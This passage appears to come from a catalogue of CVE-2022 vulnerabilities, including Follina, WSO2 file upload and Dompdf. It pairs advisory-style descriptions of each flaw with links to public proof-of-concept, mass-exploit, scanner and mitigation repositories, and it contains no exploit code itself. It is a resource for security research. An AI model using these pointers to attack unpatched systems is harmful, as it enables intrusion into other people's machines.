By using a link with <code>rel="localization"</code> a use-after-free could have been triggered by destroying an object during JavaScript execution and then referencing the object through a freed pointer, leading to a potential exploitable crash. This vulnerability affects Thunderbird < 91.8, Firefox < 99, and Firefox ESR < 91.8.
- [bb33bb/CVE-2022-28282-firefox](https://github.com/bb33bb/CVE-2022-28282-firefox)
### CVE-2022-28346 (2022-04-12)
An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs.
- [YouGina/CVE-2022-28346](https://github.com/YouGina/CVE-2022-28346)
- [DeEpinGh0st/CVE-2022-28346](https://github.com/DeEpinGh0st/CVE-2022-28346)
- [ahsentekd/CVE-2022-28346](https://github.com/ahsentekd/CVE-2022-28346)
- [vincentinttsh/CVE-2022-28346](https://github.com/vincentinttsh/CVE-2022-28346)
- [kamal-marouane/CVE-2022-28346](https://github.com/kamal-marouane/CVE-2022-28346)
### CVE-2022-28368 (2022-04-03)
Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).
- [rvizx/CVE-2022-28368](https://github.com/rvizx/CVE-2022-28368)
- [That-Guy-Steve/CVE-2022-28368-handler](https://github.com/That-Guy-Steve/CVE-2022-28368-handler)
- [Henryisnotavailable/Dompdf-Exploit-RCE](https://github.com/Henryisnotavailable/Dompdf-Exploit-RCE)
### CVE-2022-28381 (2022-04-03)
Mediaserver.exe in ALLMediaServer 1.6 has a stack-based buffer overflow that allows remote attackers to execute arbitrary code via a long string to TCP port 888, a related issue to CVE-2017-17932.
- [DShankle/CVE-2022-28381_PoC](https://github.com/DShankle/CVE-2022-28381_PoC)
### CVE-2022-28452 (2022-04-29)
Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection.
- [YavuzSahbaz/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL](https://github.com/YavuzSahbaz/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL)
### CVE-2022-28454 (2022-04-28)
Limbas 4.3.36.1319 is vulnerable to Cross Site Scripting (XSS).
- [YavuzSahbaz/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-](https://github.com/YavuzSahbaz/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-)
### CVE-2022-28508 (2022-05-04)
An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.
- [YavuzSahbaz/CVE-2022-28508](https://github.com/YavuzSahbaz/CVE-2022-28508)
### CVE-2022-28590 (2022-05-03)
A Remote Code Execution (RCE) vulnerability exists in Pixelimity 1.0 via admin/admin-ajax.php?action=install_theme.
- [jcarabantes/CVE-2022-28590](https://github.com/jcarabantes/CVE-2022-28590)
### CVE-2022-28598 (2022-08-22)
Frappe ERPNext 12.29.0 is vulnerable to XSS where the software does not neutralize or incorrectly neutralize user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [patrickdeanramos/CVE-2022-28598](https://github.com/patrickdeanramos/CVE-2022-28598)
### CVE-2022-28601 (2022-05-10)
A Two-Factor Authentication (2FA) bypass vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor allows remote attackers to overwrite the phone number used for confirmation via the profile.php file. Therefore, allowing them to bypass the phone verification mechanism.
- [FlaviuPopescu/CVE-2022-28601](https://github.com/FlaviuPopescu/CVE-2022-28601)
### CVE-2022-28672 (2022-07-18)
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 11.2.1.53537. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Doc objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16640.
- [hacksysteam/CVE-2022-28672](https://github.com/hacksysteam/CVE-2022-28672)
- [fastmo/CVE-2022-28672](https://github.com/fastmo/CVE-2022-28672)
### CVE-2022-28943
- [zhefox/CVE-2022-28943](https://github.com/zhefox/CVE-2022-28943)
### CVE-2022-28944 (2022-05-23)
Certain EMCO Software products are affected by: CWE-494: Download of Code Without Integrity Check. This affects MSI Package Builder for Windows 9.1.4 and Remote Installer for Windows 6.0.13 and Ping Monitor for Windows 8.0.18 and Remote Shutdown for Windows 7.2.2 and WakeOnLan 2.0.8 and Network Inventory for Windows 5.8.22 and Network Software Scanner for Windows 2.0.8 and UnLock IT for Windows 6.1.1. The impact is: execute arbitrary code (remote). The component is: Updater. The attack vector is: To exploit this vulnerability, a user must trigger an update of an affected installation of EMCO Software. ¶¶ Multiple products from EMCO Software are affected by a remote code execution vulnerability during the update process.
- [gerr-re/cve-2022-28944](https://github.com/gerr-re/cve-2022-28944)
### CVE-2022-28986 (2022-05-10)
LMS Doctor Simple 2 Factor Authentication Plugin For Moodle Affected: 2021072900 has an Insecure direct object references (IDOR) vulnerability, which allows remote attackers to update sensitive records such as email, password and phone number of other user accounts.
- [FlaviuPopescu/CVE-2022-28986](https://github.com/FlaviuPopescu/CVE-2022-28986)
### CVE-2022-29004 (2022-05-23)
Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.
- [sudoninja-noob/CVE-2022-29004](https://github.com/sudoninja-noob/CVE-2022-29004)
### CVE-2022-29005 (2022-05-23)
Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.
- [sudoninja-noob/CVE-2022-29005](https://github.com/sudoninja-noob/CVE-2022-29005)
### CVE-2022-29006 (2022-05-11)
Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication.
- [sudoninja-noob/CVE-2022-29006](https://github.com/sudoninja-noob/CVE-2022-29006)
### CVE-2022-29007 (2022-05-11)
Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication.
- [sudoninja-noob/CVE-2022-29007](https://github.com/sudoninja-noob/CVE-2022-29007)
### CVE-2022-29008 (2022-05-11)
An insecure direct object reference (IDOR) vulnerability in the viewid parameter of Bus Pass Management System v1.0 allows attackers to access sensitive information.
- [sudoninja-noob/CVE-2022-29008](https://github.com/sudoninja-noob/CVE-2022-29008)
### CVE-2022-29009 (2022-05-11)
Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allows attackers to bypass authentication.
- [sudoninja-noob/CVE-2022-29009](https://github.com/sudoninja-noob/CVE-2022-29009)
### CVE-2022-29063 (2022-09-02)
The Solr plugin of Apache OFBiz is configured by default to automatically make a RMI request on localhost, port 1099. In version 18.12.05 and earlier, by hosting a malicious RMI server on localhost, an attacker may exploit this behavior, at server start-up or on a server restart, in order to run arbitrary code. Upgrade to at least 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12646.
- [mbadanoiu/CVE-2022-29063](https://github.com/mbadanoiu/CVE-2022-29063)
### CVE-2022-29072 (2022-04-15)
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. NOTE: multiple third parties have reported that no privilege escalation can occur
- [kagancapar/CVE-2022-29072](https://github.com/kagancapar/CVE-2022-29072)
- [tiktb8/CVE-2022-29072](https://github.com/tiktb8/CVE-2022-29072)
- [sentinelblue/CVE-2022-29072](https://github.com/sentinelblue/CVE-2022-29072)
- [Phantomiman/7-Zip.chm-Mitigation](https://github.com/Phantomiman/7-Zip.chm-Mitigation)
- [rasan2001/CVE-2022-29072](https://github.com/rasan2001/CVE-2022-29072)
### CVE-2022-29078 (2022-04-25)
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
- [miko550/CVE-2022-29078](https://github.com/miko550/CVE-2022-29078)
- [liam-star-black-master/expluatation_CVE-2022-29078](https://github.com/liam-star-black-master/expluatation_CVE-2022-29078)
### CVE-2022-29154 (2022-08-02)
An issue was discovered in rsync before 3.2.5 that allows malicious remote servers to write arbitrary files inside the directories of connecting peers. The server chooses which files/directories are sent to the client. However, the rsync client performs insufficient validation of file names. A malicious rsync server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the rsync client target directory and subdirectories (for example, overwrite the .ssh/authorized_keys file).
- [EgeBalci/CVE-2022-29154](https://github.com/EgeBalci/CVE-2022-29154)
### CVE-2022-29170 (2022-05-20)
Grafana is an open-source platform for monitoring and observability. In Grafana Enterprise, the Request security feature allows list allows to configure Grafana in a way so that the instance doesn’t call or only calls specific hosts. The vulnerability present starting with version 7.4.0-beta1 and prior to versions 7.5.16 and 8.5.3 allows someone to bypass these security configurations if a malicious datasource (running on an allowed host) returns an HTTP redirect to a forbidden host. The vulnerability only impacts Grafana Enterprise when the Request security allow list is used and there is a possibility to add a custom datasource to Grafana which returns HTTP redirects. In this scenario, Grafana would blindly follow the redirects and potentially give secure information to the clients. Grafana Cloud is not impacted by this vulnerability. Versions 7.5.16 and 8.5.3 contain a patch for this issue. There are currently no known workarounds.
- [yijikeji/CVE-2022-29170](https://github.com/yijikeji/CVE-2022-29170)
### CVE-2022-29221 (2022-05-24)
Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject php code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds.
- [sbani/CVE-2022-29221-PoC](https://github.com/sbani/CVE-2022-29221-PoC)
### CVE-2022-29303 (2022-05-12)
SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
- [Chocapikk/CVE-2022-29303](https://github.com/Chocapikk/CVE-2022-29303)
- [1f3lse/CVE-2022-29303](https://github.com/1f3lse/CVE-2022-29303)
### CVE-2022-29337 (2022-05-24)
C-DATA FD702XW-X-R430 v2.1.13_X001 was discovered to contain a command injection vulnerability via the va_cmd parameter in formlanipv6. This vulnerability allows attackers to execute arbitrary commands via a crafted HTTP request.
- [exploitwritter/CVE-2022-29337](https://github.com/exploitwritter/CVE-2022-29337)
### CVE-2022-29359 (2022-05-24)
A stored cross-site scripting (XSS) vulnerability in /scas/?page=clubs/application_form&id=7 of School Club Application System v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.
- [ZSECURE/CVE-2022-29359](https://github.com/ZSECURE/CVE-2022-29359)
### CVE-2022-29361 (2022-05-24)
Improper parsing of HTTP requests in Pallets Werkzeug v2.1.0 and below allows attackers to perform HTTP Request Smuggling using a crafted HTTP request with multiple requests included inside the body. NOTE: the vendor's position is that this behavior can only occur in unsupported configurations involving development mode and an HTTP server from outside the Werkzeug project
- [kevin-mizu/Werkzeug-CVE-2022-29361-PoC](https://github.com/kevin-mizu/Werkzeug-CVE-2022-29361-PoC)
- [l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS](https://github.com/l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS)
### CVE-2022-29380 (2022-05-25)
Academy-LMS v4.3 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the SEO panel.
- [OpenXP-Research/CVE-2022-29380](https://github.com/OpenXP-Research/CVE-2022-29380)
### CVE-2022-29383 (2022-05-13)
NETGEAR ProSafe SSL VPN firmware FVS336Gv2 and FVS336Gv3 was discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
- [badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383](https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383)
- [cxaqhq/netgear-to-CVE-2022-29383](https://github.com/cxaqhq/netgear-to-CVE-2022-29383)
### CVE-2022-29455 (2022-06-13)
DOM-based Reflected Cross-Site Scripting (XSS) vulnerability in Elementor's Elementor Website Builder plugin <= 3.5.5 versions.
- [GULL2100/Wordpress_xss-CVE-2022-29455](https://github.com/GULL2100/Wordpress_xss-CVE-2022-29455)
- [akhilkoradiya/CVE-2022-29455](https://github.com/akhilkoradiya/CVE-2022-29455)
- [yaudahbanh/CVE-2022-29455](https://github.com/yaudahbanh/CVE-2022-29455)
- [0xc4t/CVE-2022-29455](https://github.com/0xc4t/CVE-2022-29455)
- [tucommenceapousser/CVE-2022-29455](https://github.com/tucommenceapousser/CVE-2022-29455)
- [tucommenceapousser/CVE-2022-29455-mass](https://github.com/tucommenceapousser/CVE-2022-29455-mass)
### CVE-2022-29464 (2022-04-18)
Certain WSO2 products allow unrestricted file upload with resultant remote code execution. The attacker must use a /fileupload endpoint with a Content-Disposition directory traversal sequence to reach a directory under the web root, such as a ../../../../repository/deployment/server/webapps directory. This affects WSO2 API Manager 2.2.0 up to 4.0.0, WSO2 Identity Server 5.2.0 up to 5.11.0, WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0 and 5.6.0, WSO2 Identity Server as Key Manager 5.3.0 up to 5.11.0, WSO2 Enterprise Integrator 6.2.0 up to 6.6.0, WSO2 Open Banking AM 1.4.0 up to 2.0.0 and WSO2 Open Banking KM 1.4.0, up to 2.0.0.
- [hakivvi/CVE-2022-29464](https://github.com/hakivvi/CVE-2022-29464)
- [tufanturhan/wso2-rce-cve-2022-29464](https://github.com/tufanturhan/wso2-rce-cve-2022-29464)
- [mr-r3bot/WSO2-CVE-2022-29464](https://github.com/mr-r3bot/WSO2-CVE-2022-29464)
- [Lidong-io/cve-2022-29464](https://github.com/Lidong-io/cve-2022-29464)
- [hev0x/CVE-2022-29464](https://github.com/hev0x/CVE-2022-29464)
- [gpiechnik2/nmap-CVE-2022-29464](https://github.com/gpiechnik2/nmap-CVE-2022-29464)
- [0xAgun/CVE-2022-29464](https://github.com/0xAgun/CVE-2022-29464)
- [oppsec/WSOB](https://github.com/oppsec/WSOB)
- [h3xcr4ck3r/CVE-2022-29464](https://github.com/h3xcr4ck3r/CVE-2022-29464)
- [lowkey0808/cve-2022-29464](https://github.com/lowkey0808/cve-2022-29464)
- [superzerosec/CVE-2022-29464](https://github.com/superzerosec/CVE-2022-29464)
- [axin2019/CVE-2022-29464](https://github.com/axin2019/CVE-2022-29464)
- [LinJacck/CVE-2022-29464](https://github.com/LinJacck/CVE-2022-29464)
- [Inplex-sys/CVE-2022-29464-loader](https://github.com/Inplex-sys/CVE-2022-29464-loader)
- [Chocapikk/CVE-2022-29464](https://github.com/Chocapikk/CVE-2022-29464)
- [jimidk/Better-CVE-2022-29464](https://github.com/jimidk/Better-CVE-2022-29464)
- [electr0lulz/Mass-exploit-CVE-2022-29464](https://github.com/electr0lulz/Mass-exploit-CVE-2022-29464)
- [xinghonghaoyue/CVE-2022-29464](https://github.com/xinghonghaoyue/CVE-2022-29464)
- [Pasch0/WSO2RCE](https://github.com/Pasch0/WSO2RCE)
- [r4x0r1337/-CVE-2022-29464](https://github.com/r4x0r1337/-CVE-2022-29464)
- [amit-pathak009/CVE-2022-29464](https://github.com/amit-pathak009/CVE-2022-29464)
- [amit-pathak009/CVE-2022-29464-mass](https://github.com/amit-pathak009/CVE-2022-29464-mass)
- [hupe1980/CVE-2022-29464](https://github.com/hupe1980/CVE-2022-29464)
- [gbrsh/CVE-2022-29464](https://github.com/gbrsh/CVE-2022-29464)
- [devengpk/CVE-2022-29464](https://github.com/devengpk/CVE-2022-29464)
- [ThatNotEasy/CVE-2022-29464](https://github.com/ThatNotEasy/CVE-2022-29464)
- [Pushkarup/CVE-2022-29464](https://github.com/Pushkarup/CVE-2022-29464)
- [SynixCyberCrimeMy/CVE-2022-29464](https://github.com/SynixCyberCrimeMy/CVE-2022-29464)
- [cc3305/CVE-2022-29464](https://github.com/cc3305/CVE-2022-29464)
### CVE-2022-29465 (2022-08-05)
An out-of-bounds write vulnerability exists in the PSD Header processing memory allocation functionality of Accusoft ImageGear 20.0. A specially-crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.
- [badguy233/CVE-2022-29465](https://github.com/badguy233/CVE-2022-29465)
### CVE-2022-29469
- [S4muraiMelayu1337/CVE-2022-29469](https://github.com/S4muraiMelayu1337/CVE-2022-29469)
### CVE-2022-29548 (2022-04-21)
A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.
- [cxosmo/CVE-2022-29548](https://github.com/cxosmo/CVE-2022-29548)
### CVE-2022-29551
- [ComparedArray/printix-CVE-2022-29551](https://github.com/ComparedArray/printix-CVE-2022-29551)
### CVE-2022-29552
- [ComparedArray/printix-CVE-2022-29552](https://github.com/ComparedArray/printix-CVE-2022-29552)
### CVE-2022-29553
- [ComparedArray/printix-CVE-2022-29553](https://github.com/ComparedArray/printix-CVE-2022-29553)
### CVE-2022-29554
- [ComparedArray/printix-CVE-2022-29554](https://github.com/ComparedArray/printix-CVE-2022-29554)
### CVE-2022-29581 (2022-05-17)
Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions.
- [Nidhi77777/linux-4.19.72_CVE-2022-29581](https://github.com/Nidhi77777/linux-4.19.72_CVE-2022-29581)
- [nidhihcl/linux-4.19.72_CVE-2022-29581](https://github.com/nidhihcl/linux-4.19.72_CVE-2022-29581)
### CVE-2022-29582 (2022-04-22)
In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently.
- [Ruia-ruia/CVE-2022-29582-Exploit](https://github.com/Ruia-ruia/CVE-2022-29582-Exploit)
### CVE-2022-29593 (2022-07-14)
relay_cgi.cgi on Dingtian DT-R002 2CH relay devices with firmware 3.1.276A allows an attacker to replay HTTP post requests without the need for authentication or a valid signed/authorized request.
- [9lyph/CVE-2022-29593](https://github.com/9lyph/CVE-2022-29593)
### CVE-2022-29597 (2022-06-02)
Solutions Atlantic Regulatory Reporting System (RRS) v500 is vulnerable to Local File Inclusion (LFI). Any authenticated user has the ability to reference internal system files within requests made to the RRSWeb/maint/ShowDocument/ShowDocument.aspx page. The server will successfully respond with the file contents of the internal system file requested. This ability could allow for adversaries to extract sensitive data and/or files from the underlying file system, gain knowledge about the internal workings of the system, or access source code of the application.
- [TheGetch/CVE-2022-29597](https://github.com/TheGetch/CVE-2022-29597)
### CVE-2022-29598 (2022-05-27)
Solutions Atlantic Regulatory Reporting System (RRS) v500 is vulnerable to an reflected Cross-Site Scripting (XSS) vulnerability via RRSWeb/maint/ShowDocument/ShowDocument.aspx .
- [TheGetch/CVE-2022-29598](https://github.com/TheGetch/CVE-2022-29598)
### CVE-2022-29622 (2022-05-16)
An arbitrary file upload vulnerability in formidable v3.1.4 allows attackers to execute arbitrary code via a crafted filename. NOTE: some third parties dispute this issue because the product has common use cases in which uploading arbitrary files is the desired behavior. Also, there are configuration options in all versions that can change the default behavior of how files are handled. Strapi does not consider this to be a valid vulnerability.
- [keymandll/CVE-2022-29622](https://github.com/keymandll/CVE-2022-29622)
### CVE-2022-29778 (2022-06-03)
D-Link DIR-890L 1.20b01 allows attackers to execute arbitrary code due to the hardcoded option Wake-On-Lan for the parameter 'descriptor' at SetVirtualServerSettings.php
- [TyeYeah/DIR-890L-1.20-RCE](https://github.com/TyeYeah/DIR-890L-1.20-RCE)
### CVE-2022-29856 (2022-04-29)
A hardcoded cryptographic key in Automation360 22 allows an attacker to decrypt exported RPA packages.
- [Flo451/CVE-2022-29856-PoC](https://github.com/Flo451/CVE-2022-29856-PoC)
### CVE-2022-29885 (2022-05-12)
The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks.
- [quynhlab/CVE-2022-29885](https://github.com/quynhlab/CVE-2022-29885)
- [iveresk/CVE-2022-29885](https://github.com/iveresk/CVE-2022-29885)
### CVE-2022-29932 (2022-05-11)
The HTTP Server in PRIMEUR SPAZIO 2.5.1.954 (File Transfer) allows an unauthenticated attacker to obtain sensitive data (related to the content of transferred files) via a crafted HTTP request.
- [Off3nS3c/CVE-2022-29932](https://github.com/Off3nS3c/CVE-2022-29932)
### CVE-2022-29968 (2022-05-02)
An issue was discovered in the Linux kernel through 5.17.5. io_rw_init_file in fs/io_uring.c lacks initialization of kiocb->private.
- [jprx/CVE-2022-29968](https://github.com/jprx/CVE-2022-29968)
### CVE-2022-30006
- [ComparedArray/printix-CVE-2022-30006](https://github.com/ComparedArray/printix-CVE-2022-30006)
### CVE-2022-30023 (2022-06-16)
Tenda ONT GPON AC1200 Dual band WiFi HG9 v1.0.1 is vulnerable to Command Injection via the Ping function.
- [Haniwa0x01/CVE-2022-30023](https://github.com/Haniwa0x01/CVE-2022-30023)
### CVE-2022-30040 (2022-05-11)
Tenda AX1803 v1.0.0.1_2890 is vulnerable to Buffer Overflow. The vulnerability lies in rootfs_ In / goform / setsystimecfg of / bin / tdhttpd in ubif file system, attackers can access http://ip/goform/SetSysTimeCfg, and by setting the ntpserve parameter, the stack buffer overflow can be caused to achieve the effect of router denial of service.
- [Le1a/CVE-2022-30040](https://github.com/Le1a/CVE-2022-30040)
### CVE-2022-30075 (2022-06-09)
In TP-Link Router AX50 firmware 210730 and older, import of a malicious backup file via web interface can lead to remote code execution due to improper validation.
- [aaronsvk/CVE-2022-30075](https://github.com/aaronsvk/CVE-2022-30075)
- [SAJIDAMINE/CVE-2022-30075](https://github.com/SAJIDAMINE/CVE-2022-30075)
- [M4fiaB0y/CVE-2022-30075](https://github.com/M4fiaB0y/CVE-2022-30075)
### CVE-2022-30114 (2023-05-19)
A heap-based buffer overflow in a network service in Fastweb FASTGate MediaAccess FGA2130FWB, firmware version 18.3.n.0482_FW_230_FGA2130, and DGA4131FWB, firmware version up to 18.3.n.0462_FW_261_DGA4131, allows a remote attacker to reboot the device through a crafted HTTP request, causing DoS.
- [str0ng4le/CVE-2022-30114](https://github.com/str0ng4le/CVE-2022-30114)
### CVE-2022-30129 (2022-05-10)
Visual Studio Code Remote Code Execution Vulnerability
- [RoccoPearce/CVE-2022-30129](https://github.com/RoccoPearce/CVE-2022-30129)
### CVE-2022-30136 (2022-06-15)
Windows Network File System Remote Code Execution Vulnerability
- [fortra/CVE-2022-30136](https://github.com/fortra/CVE-2022-30136)
- [AXRoux/CVE-2022-30136](https://github.com/AXRoux/CVE-2022-30136)
### CVE-2022-30190 (2022-06-01)
A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.\nPlease see the MSRC Blog Entry for important information about steps you can take to protect your system from this vulnerability.\n
- [JMousqueton/PoC-CVE-2022-30190](https://github.com/JMousqueton/PoC-CVE-2022-30190)
- [zkl21hoang/msdt-follina-office-rce](https://github.com/zkl21hoang/msdt-follina-office-rce)
- [onecloudemoji/CVE-2022-30190](https://github.com/onecloudemoji/CVE-2022-30190)
- [2867a0/CVE-2022-30190](https://github.com/2867a0/CVE-2022-30190)
- [doocop/CVE-2022-30190](https://github.com/doocop/CVE-2022-30190)
- [archanchoudhury/MSDT_CVE-2022-30190](https://github.com/archanchoudhury/MSDT_CVE-2022-30190)
- [rickhenderson/cve-2022-30190](https://github.com/rickhenderson/cve-2022-30190)
- [DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup](https://github.com/DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup)
- [kdk2933/msdt-CVE-2022-30190](https://github.com/kdk2933/msdt-CVE-2022-30190)
- [sentinelblue/CVE-2022-30190](https://github.com/sentinelblue/CVE-2022-30190)
- [aymankhder/MSDT_CVE-2022-30190-follina-](https://github.com/aymankhder/MSDT_CVE-2022-30190-follina-)
- [PaddlingCode/cve-2022-30190](https://github.com/PaddlingCode/cve-2022-30190)
- [dwisiswant0/gollina](https://github.com/dwisiswant0/gollina)
- [hscorpion/CVE-2022-30190](https://github.com/hscorpion/CVE-2022-30190)
- [drgreenthumb93/CVE-2022-30190-follina](https://github.com/drgreenthumb93/CVE-2022-30190-follina)
- [mitespsoc/CVE-2022-30190-POC](https://github.com/mitespsoc/CVE-2022-30190-POC)
- [Vaisakhkm2625/MSDT-0-Day-CVE-2022-30190-Poc](https://github.com/Vaisakhkm2625/MSDT-0-Day-CVE-2022-30190-Poc)
- [rouben/CVE-2022-30190-NSIS](https://github.com/rouben/CVE-2022-30190-NSIS)
- [Cosmo121/Follina-Remediation](https://github.com/Cosmo121/Follina-Remediation)
- [rayorole/CVE-2022-30190](https://github.com/rayorole/CVE-2022-30190)
- [ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190](https://github.com/ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190)
- [sudoaza/CVE-2022-30190](https://github.com/sudoaza/CVE-2022-30190)
- [gamingwithevets/msdt-disable](https://github.com/gamingwithevets/msdt-disable)
- [ErrorNoInternet/FollinaScanner](https://github.com/ErrorNoInternet/FollinaScanner)
- [ITMarcin2211/CVE-2022-30190](https://github.com/ITMarcin2211/CVE-2022-30190)
- [derco0n/mitigate-folina](https://github.com/derco0n/mitigate-folina)
- [komomon/CVE-2022-30190-follina-Office-MSDT-Fixed](https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed)
- [gyaansastra/CVE-2022-30190](https://github.com/gyaansastra/CVE-2022-30190)
- [swaiist/CVE-2022-30190-Fix](https://github.com/swaiist/CVE-2022-30190-Fix)
- [suenerve/CVE-2022-30190-Follina-Patch](https://github.com/suenerve/CVE-2022-30190-Follina-Patch)
- [castlesmadeofsand/ms-msdt-vulnerability-pdq-package](https://github.com/castlesmadeofsand/ms-msdt-vulnerability-pdq-package)
- [WesyHub/CVE-2022-30190---Follina---Poc-Exploit](https://github.com/WesyHub/CVE-2022-30190---Follina---Poc-Exploit)
- [0xflagplz/MS-MSDT-Office-RCE-Follina](https://github.com/0xflagplz/MS-MSDT-Office-RCE-Follina)
- [arozx/CVE-2022-30190](https://github.com/arozx/CVE-2022-30190)
- [Noxtal/follina](https://github.com/Noxtal/follina)
- [droidrzrlover/CVE-2022-30190](https://github.com/droidrzrlover/CVE-2022-30190)
- [hilt86/cve-2022-30190-mitigate](https://github.com/hilt86/cve-2022-30190-mitigate)
- [SrikeshMaharaj/CVE-2022-30190](https://github.com/SrikeshMaharaj/CVE-2022-30190)
- [AbdulRKB/Follina](https://github.com/AbdulRKB/Follina)
- [DerZiad/CVE-2022-30190](https://github.com/DerZiad/CVE-2022-30190)
- [tej7gandhi/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt](https://github.com/tej7gandhi/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt)
- [ItsNee/Follina-CVE-2022-30190-POC](https://github.com/ItsNee/Follina-CVE-2022-30190-POC)
- [IamVSM/msdt-follina](https://github.com/IamVSM/msdt-follina)
- [Rojacur/FollinaPatcherCLI](https://github.com/Rojacur/FollinaPatcherCLI)
- [joshuavanderpoll/CVE-2022-30190](https://github.com/joshuavanderpoll/CVE-2022-30190)
- [abhirules27/Follina](https://github.com/abhirules27/Follina)
- [dsibilio/follina-spring](https://github.com/dsibilio/follina-spring)
- [Malwareman007/Deathnote](https://github.com/Malwareman007/Deathnote)
- [sentrium-security/Follina-Workaround-CVE-2022-30190](https://github.com/sentrium-security/Follina-Workaround-CVE-2022-30190)
- [Hrishikesh7665/Follina_Exploiter_CLI](https://github.com/Hrishikesh7665/Follina_Exploiter_CLI)
- [b401/Clickstudio-compromised-certificate](https://github.com/b401/Clickstudio-compromised-certificate)
- [k508/CVE-2022-30190](https://github.com/k508/CVE-2022-30190)
- [amitniz/follina_cve_2022-30190](https://github.com/amitniz/follina_cve_2022-30190)
- [Abdibimantara/CVE-2022-30190-Analysis-With-LetsDefends-Lab](https://github.com/Abdibimantara/CVE-2022-30190-Analysis-With-LetsDefends-Lab)
- [SrCroqueta/CVE-2022-30190_Temporary_Fix](https://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix)
- [SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code](https://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code)
- [SonicWave21/Follina-CVE-2022-30190-Unofficial-patch](https://github.com/SonicWave21/Follina-CVE-2022-30190-Unofficial-patch)
- [nanaao/PicusSecurity4.Week.Repo](https://github.com/nanaao/PicusSecurity4.Week.Repo)
